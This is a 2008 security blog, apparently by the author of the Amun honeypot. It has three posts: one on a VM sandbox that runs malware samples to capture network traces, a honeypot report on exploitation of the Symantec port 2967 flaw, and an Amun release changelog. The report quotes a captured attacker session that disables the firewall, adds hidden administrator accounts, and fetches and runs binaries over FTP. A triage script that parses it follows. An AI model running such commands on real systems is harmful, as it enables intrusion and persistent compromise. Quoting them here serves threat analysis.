Virus Blog

Necessity is the mother of invention.

— Posted by zeroq @ 19:36 - 24 Feb, 2008

I was in need of some pcap files of IRC-bot-infected machines; unfortunately they are not so easy to get. Thus I decided to write a little tool which automatically generates pcap traces for submitted samples.

The tool is divided into two parts. The first part is a little Windows TCP server, capable of receiving binary data and executing it. This part runs in a virtual machine running Windows as its operating system. The second part is a short Python script running on a Linux host outside the virtual machine. It takes binary files from a directory and transmits them one by one to the virtual machine. While the virtual host runs the submitted binary, the Python script captures the network traffic and constructs the pcap file. After a predefined timeout, the Python script sends a revert-to-snapshot to the virtual machine and sends the next binary.

As a result I have a little tool to automatically construct pcap files of infected machines running for a configurable time. Currently I am constructing pcaps of malware running for 5 minutes on the virtual machine.
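The controller half of that setup, written out as an added example (this is not the author's script and the post does not give its wire format). It assumes a length-prefixed framing with a one-byte ACK between the Linux controller and the in-VM receiver, tcpdump for the capture, and a hypervisor CLI for the revert (vmrun or VBoxManage shown as placeholders); the receiver loop is included so the framing can be checked over a loopback socket without any VM.

```python
import socket
import struct
import subprocess
import threading
import time
from pathlib import Path

# Wire format assumed for this example (the post does not specify one): a
# 4-byte big-endian length prefix followed by the raw sample bytes, answered
# by the receiver with a single ACK byte once the whole file has arrived.
ACK = b"\x01"
MAX_SAMPLE = 64 * 1024 * 1024


def frame_sample(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-frame")
        buf.extend(chunk)
    return bytes(buf)


def recv_frame(sock: socket.socket) -> bytes:
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    if length > MAX_SAMPLE:  # never let a peer-supplied length drive allocation blindly
        raise ValueError(f"frame of {length} bytes exceeds limit")
    return recv_exact(sock, length)


def send_sample(host: str, port: int, data: bytes, timeout: float = 30.0) -> bool:
    """Controller side: push one sample to the receiver, True once it ACKs."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame_sample(data))
        return recv_exact(s, 1) == ACK


def serve_one(listener: socket.socket, handler) -> None:
    """Receiver side of the same protocol (the in-VM server would execute
    the file after handing it to `handler`)."""
    conn, _ = listener.accept()
    with conn:
        handler(recv_frame(conn))
        conn.sendall(ACK)


def loopback_roundtrip(data: bytes) -> bytes:
    """Check the framing over a local socket, no VM needed; returns what the
    receiver got, or b"" if the transfer was not acknowledged."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    received = []
    t = threading.Thread(target=serve_one, args=(listener, received.append))
    t.start()
    acked = send_sample("127.0.0.1", listener.getsockname()[1], data)
    t.join()
    listener.close()
    return received[0] if acked and received else b""


def run_sample(sample: Path, vm_ip: str, vm_port: int, iface: str, pcap_dir: Path,
               run_seconds: int, revert_cmd: list) -> Path:
    """Capture vm_ip's traffic while it runs `sample`, then revert the VM.
    tcpdump and revert_cmd are lab assumptions, e.g.
    ["vmrun", "revertToSnapshot", "/vms/xp.vmx", "clean"]."""
    pcap = pcap_dir / (sample.name + ".pcap")
    cap = subprocess.Popen(["tcpdump", "-i", iface, "-w", str(pcap), "host", vm_ip],
                           stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        time.sleep(1)  # let tcpdump attach before the sample starts talking
        if not send_sample(vm_ip, vm_port, sample.read_bytes()):
            raise RuntimeError(f"no ACK for {sample.name}")
        time.sleep(run_seconds)
    finally:
        cap.terminate()
        cap.wait()
        subprocess.run(revert_cmd, check=True)  # clean image for the next sample
    return pcap


def run_directory(sample_dir: Path, pcap_dir: Path, **lab) -> list:
    pcap_dir.mkdir(parents=True, exist_ok=True)
    return [run_sample(p, pcap_dir=pcap_dir, **lab)
            for p in sorted(sample_dir.iterdir()) if p.is_file()]


if __name__ == "__main__":
    # Placeholder lab values; the VM address, port, interface and snapshot are assumptions.
    run_directory(Path("samples"), Path("pcaps"), vm_ip="192.168.56.10", vm_port=4444,
                  iface="vboxnet0", run_seconds=300,
                  revert_cmd=["VBoxManage", "snapshot", "xp-sandbox", "restore", "clean"])
```

The revert runs in a `finally` so a sample that hangs the receiver or never ACKs still leaves a clean image for the next one, and the capture filter is pinned to the VM's address so host-side traffic does not end up in the trace. Keep the VM on an isolated host-only network: a bot that runs for five minutes will try to join its IRC channel and scan, and the capture is only useful if that traffic never reaches anything real.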



Symantec Vulnerability

— Posted by zeroq @ 10:40 - 22 Feb, 2008

The vulnerability in the Symantec Anti-Virus/Client Security software listening on port 2967 is actively exploited, as we can determine from the Amun honeypot log files.

Different hosts frequently exploit our emulated vulnerability and inject shellcode which instructs the client to connect back to the attacker, presenting a shell for further commands:

exploit 222.133.xxx.xxx:1786 -> xxx.xxx.129.106:2967 (SYMANTEC: cbacks://222.133.xxx.xxx:6000/)

Commands entered in the shell instruct the victim to download additional files via FTP:

net stop sharedaccess
net user guest active:yes
net user guest !!!@@@QQQaaa
net localgroup administrators guest /add
net user sb$ sb /add
net localgroup administrators sb$ /add
echo open 124.234.xxx.xxx>>ftp.txt
echo sb>>ftp.txt
echo sb>>ftp.txt
echo bin>>ftp.txt
echo get sx.exe>>ftp.txt
echo get qq.exe>>ftp.txt
echo get 3389.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
sx.exe
qq.exe
3389.exe -o 3389
3389.exe -r
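As an added example (not part of Amun or of this post), a small Python triage of the captured log line and shell transcript above, pulling out what a responder would want first: the connect-back address from the cbacks:// URL, the accounts created and elevated, the FTP server and credentials reconstructed from the echo-built ftp -s: script, and the binaries launched. The sample input is copied from this post, so the host patterns accept the author's xxx masking; the log-line layout is taken from the one line shown here and is an assumption for any other Amun version.

```python
import re

# Constructed sample: the Amun log line and shell transcript from this post.
LOG_LINE = ("exploit 222.133.xxx.xxx:1786 -> xxx.xxx.129.106:2967 "
            "(SYMANTEC: cbacks://222.133.xxx.xxx:6000/)")
SESSION = [
    "net stop sharedaccess",
    "net user guest active:yes",
    "net user guest !!!@@@QQQaaa",
    "net localgroup administrators guest /add",
    "net user sb$ sb /add",
    "net localgroup administrators sb$ /add",
    "echo open 124.234.xxx.xxx>>ftp.txt",
    "echo sb>>ftp.txt",
    "echo sb>>ftp.txt",
    "echo bin>>ftp.txt",
    "echo get sx.exe>>ftp.txt",
    "echo get qq.exe>>ftp.txt",
    "echo get 3389.exe>>ftp.txt",
    "echo bye>>ftp.txt",
    "ftp -s:ftp.txt",
    "sx.exe",
    "qq.exe",
    "3389.exe -o 3389",
    "3389.exe -r",
]

# Layout of the exploit line as it appears above (an assumption beyond this one sample).
EXPLOIT_RE = re.compile(
    r"^exploit (?P<src>[\w.]+):(?P<sport>\d+) -> (?P<dst>[\w.]+):(?P<dport>\d+) "
    r"\((?P<vuln>[A-Z0-9_]+): (?P<url>[^)\s]+)\)$")
CBACK_RE = re.compile(r"^cbacks://(?P<host>[\w.]+):(?P<port>\d+)/?$")
ECHO_RE = re.compile(r"^echo (?P<text>.*?)>>(?P<file>\S+)$")
FIREWALL_STOP = re.compile(r"^net stop sharedaccess$", re.I)  # SharedAccess = Windows Firewall/ICS
NET_USER_ADD = re.compile(r"^net user (?P<name>\S+) (?P<pw>\S+) /add$", re.I)
NET_ADMIN_ADD = re.compile(r"^net localgroup administrators (?P<name>\S+) /add$", re.I)
FTP_RUN = re.compile(r"^ftp -s:(?P<file>\S+)$", re.I)


def parse_exploit_line(line):
    m = EXPLOIT_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["sport"], d["dport"] = int(d["sport"]), int(d["dport"])
    cb = CBACK_RE.match(d["url"])
    d["callback"] = (cb["host"], int(cb["port"])) if cb else None
    return d


def parse_ftp_script(lines):
    """ftp -s: reads the two lines after `open <host>` as user and password;
    `get` lines name the files fetched."""
    info = {"server": None, "user": None, "password": None, "files": []}
    it = iter(lines)
    for line in it:
        parts = line.split()
        if len(parts) > 1 and parts[0] == "open":
            info["server"] = parts[1]
            info["user"] = next(it, None)
            info["password"] = next(it, None)
        elif len(parts) > 1 and parts[0] == "get":
            info["files"].append(parts[1])
    return info


def triage_session(commands):
    scripts = {}  # file -> lines appended with `echo ...>>file`
    r = {"firewall_disabled": False, "accounts_added": [], "admin_grants": [],
         "ftp": None, "executed": []}
    for c in (c.strip() for c in commands):
        if (m := ECHO_RE.match(c)):
            scripts.setdefault(m["file"], []).append(m["text"].strip())
        elif FIREWALL_STOP.match(c):
            r["firewall_disabled"] = True
        elif (m := NET_USER_ADD.match(c)):
            r["accounts_added"].append((m["name"], m["pw"]))  # "$" suffix: an attempt to keep it out of casual listings
        elif (m := NET_ADMIN_ADD.match(c)):
            r["admin_grants"].append(m["name"])
        elif (m := FTP_RUN.match(c)):
            r["ftp"] = parse_ftp_script(scripts.get(m["file"], []))
        else:
            parts = c.split()
            if parts and parts[0].lower().endswith(".exe"):
                r["executed"].append(c)
    return r


def extract_iocs(log_line, commands):
    """Merge the exploit-line fields with the shell triage into one record."""
    head = parse_exploit_line(log_line) or {}
    return {**head, **triage_session(commands)}


if __name__ == "__main__":
    for k, v in extract_iocs(LOG_LINE, SESSION).items():
        print(f"{k}: {v}")
```

For this session the record gives the callback 222.133.xxx.xxx:6000, the FTP drop at 124.234.xxx.xxx with user/password sb/sb, the three files fetched and the four launches, plus the two accounts pushed into Administrators, which is the list you would hand to whoever blocks the addresses and hunts the accounts.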


Amun v0.1.1

— Posted by zeroq @ 09:42 - 18 Feb, 2008

The next Amun release is now available. Things that have changed:

Changes in v0.1.1:
- fixed amun request handler to close finished connections
- fixed submit-md5 module to write in binary mode
- fixed connectbackshell loading shellcodemanager correctly
- fixed connectbackshell replying with prompt
- fixed bindport replying with prompt
- fixed http download to accept a few bytes if the download already started
- added new unencrypted bindshellcode used to exploit the VERITAS vulnerability
- added new plain tftp download regex found in asn1 exploit
- added new vuln module for port 2380
- added ftp port range configuration
- added debug option logging local ip exploits
- added new stage shellcode for vuln-pnp module
- added minimum shellcode size for vuln-upnp to avoid eMule
- added logging module for syslog
- added logging module for email
- added utility for quick shellcode checking (checkCode.py)
- updated regular expression for ftp plaintext detection
- modified bindport socket close behaviour
- modified default timeout values in amun.conf
- modified error message for not connected transports
- modified http shellcode to allow urls without port

